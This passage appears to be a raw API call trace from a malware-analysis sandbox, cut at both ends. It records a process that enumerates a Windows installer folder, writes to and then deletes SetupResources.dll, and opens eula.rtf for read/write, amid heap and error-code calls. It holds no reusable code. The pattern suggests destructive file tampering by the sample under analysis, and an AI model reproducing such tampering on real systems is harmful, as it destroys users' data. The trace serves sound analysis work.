lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.233] GetLastError () returned 0x0 [0061.233] SetLastError (dwErrCode=0x0) [0061.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0061.233] GetLastError () returned 0x0 [0061.233] SetLastError (dwErrCode=0x0) [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0061.233] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x360, lpOverlapped=0x0) returned 1 [0061.233] GetLastError () returned 0x0 [0061.233] SetLastError (dwErrCode=0x0) [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.233] GetLastError () returned 0x0 [0061.233] SetLastError (dwErrCode=0x0) [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0061.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0061.234] CloseHandle (hObject=0x420) returned 1 [0061.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.235] CloseHandle (hObject=0x428) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.236] AreFileApisANSI () returned 1 [0061.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0061.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0061.236] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.237] GetFileType (hFile=0x428) returned 0x1 [0061.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.237] GetLastError () returned 0xb7 [0061.237] SetLastError (dwErrCode=0xb7) [0061.237] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.238] CloseHandle (hObject=0x428) returned 1 [0061.238] AreFileApisANSI () returned 1 [0061.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0061.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0061.239] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 1 [0061.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.240] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6f7, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧艐\x07̧비聐蜠\x08賂̧")) returned 0 [0061.240] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0061.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0061.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0061.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.241] AreFileApisANSI () returned 1 [0061.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028", lpUsedDefaultChar=0x0) returned 27 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.241] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.241] AreFileApisANSI () returned 1 [0061.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78410 [0061.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78410, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028") returned 27 [0061.241] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028" (normalized: "c:\\588bce7c90097ed212\\1028"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.241] GetLastError () returned 0x5 [0061.242] GetLastError () returned 0x5 [0061.242] SetLastError (dwErrCode=0x5) [0061.242] GetLastError () returned 0x5 [0061.242] SetLastError (dwErrCode=0x5) [0061.242] GetLastError () returned 0x5 [0061.242] SetLastError (dwErrCode=0x5) [0061.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78410 | out: hHeap=0x20000) returned 1 [0061.242] AreFileApisANSI () returned 1 [0061.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78290 [0061.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78290, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028") returned 27 [0061.242] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028" (normalized: "c:\\588bce7c90097ed212\\1028"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.242] GetLastError () returned 0x5 [0061.242] GetLastError () returned 0x5 [0061.242] SetLastError (dwErrCode=0x5) [0061.242] GetLastError () returned 0x5 [0061.242] SetLastError (dwErrCode=0x5) [0061.242] GetLastError () returned 0x5 [0061.242] SetLastError (dwErrCode=0x5) [0061.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78290 | out: hHeap=0x20000) returned 1 [0061.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.242] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.242] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.242] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.242] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0061.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0061.243] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1029", cAlternateFileName="")) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.243] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78710 [0061.243] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.243] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0061.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0061.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0061.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.244] AreFileApisANSI () returned 1 [0061.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.244] AreFileApisANSI () returned 1 [0061.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0061.244] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.244] GetFileType (hFile=0x428) returned 0x1 [0061.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.245] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.245] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.245] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.245] CloseHandle (hObject=0x428) returned 1 [0061.245] AreFileApisANSI () returned 1 [0061.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0061.245] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.245] GetFileType (hFile=0x428) returned 0x1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.246] CloseHandle (hObject=0x428) returned 1 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 